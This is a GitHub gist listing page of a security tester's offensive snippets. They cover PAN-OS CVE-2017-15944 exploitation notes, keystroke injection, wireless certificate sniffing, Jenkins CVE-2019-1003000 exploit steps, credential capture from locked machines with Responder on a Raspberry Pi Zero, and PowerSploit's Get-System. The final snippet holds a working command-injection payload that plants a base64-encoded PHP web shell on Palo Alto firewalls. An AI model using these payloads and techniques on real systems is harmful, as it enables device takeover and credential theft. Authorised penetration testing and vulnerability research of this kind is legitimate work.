
@milo2012
milo2012 / CVE-2017-15944.md
Last active June 22, 2023 08:07
CVE-2017-15944.md

Description

I encountered a situation where the target running PAN-OS was vulnerable to CVE-2017-15944 but I was unable to exploit it using Metasploit.

The issue with exploiting CVE-2017-15944

One of the techniques for exploiting CVE-2017-15944 is to create a file under /opt/pancfg/mgmt/logdb/traffic/1/*, which gets processed by the cron job (/etc/cron.d/indexgen -> /usr/local/bin/genindex_batch.sh). Metasploit uses this technique.

The article at https://tinyhack.com/2019/01/10/alternative-way-to-exploit-cve-2017-15944-on-pan-os-6-1-0/ mentions that it might be impossible to exploit CVE-2017-15944 as the script is already running. The article mentions that the cron job (/etc/cron.d/core_compress -> /usr/local/bin/core_compress) is also vulnerable to command injection.

@milo2012
milo2012 / sendKeys.go
Created January 27, 2023 19:54
sendKeys.go
package main
import (
//"flag"
"log"
"fmt"
"strings"
"time"
"github.com/stephen-fox/user32util"
)
var timeout time.Duration = 1
@milo2012
milo2012 / sniffCert.py
Created September 27, 2018 04:17
Sniff and extract server SSL certificate of wireless access point (EAP)
#!/usr/bin/python
'''
$ python sniffCert.py -h
Usage: sniffCert.py [options]
Options:
-h, --help show this help message and exit
-i INTERFACENO Interface to sniff
$ python sniffCert.py -i en0
@milo2012
milo2012 / CVE-2010-4180.py
Last active May 25, 2022 12:03
CVE-2010-4180.py
'''
#https://www.tenable.com/plugins/nessus/51892
% python3 CVE-2010-4180.py -t x.x.x.x
[*] Connecting using Cipher: ECDHE-RSA-AES256-GCM-SHA384
SSL-Session:
Protocol : TLSv1.2
Cipher : ECDHE-RSA-AES256-GCM-SHA384
Session-ID: 9B36462FA6870CB80E916C0C1B0760D7946EA6464462B8ADF269D38BF1EAC522
Session-ID-ctx:
@milo2012
milo2012 / CVE-2020-25780.py
Created February 8, 2022 06:11
CVE-2020-25780.py
import optparse
import requests
import xml.etree.ElementTree as ET
import xmltodict
import base64
def fixed_xml_body_as_string(filename):
text='<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">'
text+=' <soapenv:Header/>'
text+=' <soapenv:Body>'
@milo2012
milo2012 / pentesting_ios_apps_on_electra.txt
Last active January 19, 2022 14:04
Pentesting IOS Applications on Electra 11.1.2
#Burp SSL Certificate on IOS 11
On iOS 11 you can't just install your MITM root cert, you also need to explicitly trust it.
You can do this by:
Settings -> General -> About -> Certificate Trust Settings -> Flip the switch on your cert
----------------------------------------------------------------------------------------------------------------
#GDB on IOS 11
Source: https://shmoo419.github.io/
gdb
ps -ax | grep -i appName
attach [processNo]
@milo2012
milo2012 / exploit_notes_Exploit Notes: CVE-2019-1003000, CVE-2019-1003001, CVE-2019-1003002.txt
Last active December 7, 2021 10:17
Exploit Notes: CVE-2019-1003000, CVE-2019-1003001, CVE-2019-1003002
Exploit Notes: CVE-2019-1003000, CVE-2019-1003001, CVE-2019-1003002
#Install vulnerable docker version of Jenkins
$ docker run -p 8080:8080 -p 50000:50000 jenkins/jenkins:2.121.2
- Go to http://127.0.0.1:8080
- Install suggested plugins
- Create a user account (admin|admin)
- Click "New Item"
- Under Item Name, enter 'Helloworld', choose 'Pipeline' and click 'OK'
- Under 'Pipeline', untick 'Use Groovy Sandbox' and click 'Save'
@milo2012
milo2012 / gist:1c638b19b61c1338e21bad23705ff8fb
Last active December 1, 2021 11:58
Snagging creds from locked machines (for Raspberry Pi Zero)
##An update to Snagging Creds From Locked Machines from https://room362.com/post/2016/snagging-creds-from-locked-machines/.
##Installation on Raspberry Pi Zero
##Download Raspbian Jessie Lite from https://www.raspberrypi.org/downloads/raspbian/
##Use Pi Filler and write image to MicroSD
##Follow Step 1) in https://learn.adafruit.com/turning-your-raspberry-pi-zero-into-a-usb-gadget/ethernet-gadget to let the Raspberry Pi Zero device emulate a USB NIC
$ cd /pentest
$ apt-get install -y python git python-pip python-dev screen sqlite3
$ pip install pycrypto
$ git clone https://github.com/lgandx/Responder
@milo2012
milo2012 / Get-System.ps1
Last active November 22, 2021 18:50
Get-System.ps1
function Get-System {
<#
.SYNOPSIS
GetSystem functionality inspired by Meterpreter's getsystem.
Author: Will Schroeder (@harmj0y), Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: PSReflect
@milo2012
milo2012 / CVE-2017-15944_1.py
Created July 19, 2021 14:29
CVE-2017-15944_1.py
#!/usr/bin/env python
# encoding: utf-8
import requests
import sys
import base64
requests.packages.urllib3.disable_warnings()
session = requests.Session()
def step3_exp():
exp_post = "{\"action\":\"PanDirect\",\"method\":\"execute\",\"data\":[\"07c5807d0d927dcd0980f86024e5208b\",\"Administrator.get\",{\"changeMyPassword\":true,\"template\":\"asd\",\"id\":\"admin']\\\" async-mode='yes' refresh='yes' cookie='../../../../../../var/cores/$(echo PD9waHAgc3lzdGVtKCRfR0VUWyJjIl0pOz8+Cg==|base64 -d >${PATH:0:1}var${PATH:0:1}appweb${PATH:0:1}htdocs${PATH:0:1}api${PATH:0:1}cmd.php).core -print -exec python -c exec(\\\"PD9waHAgc3lzdGVtKCRfR0VUWyJjIl0pOz8+Cg==\\\".decode(\\\"base64\\\")) ;'/>\\u0000\"}],\"type\":\"rpc\",\"tid\":713}"
return exp_post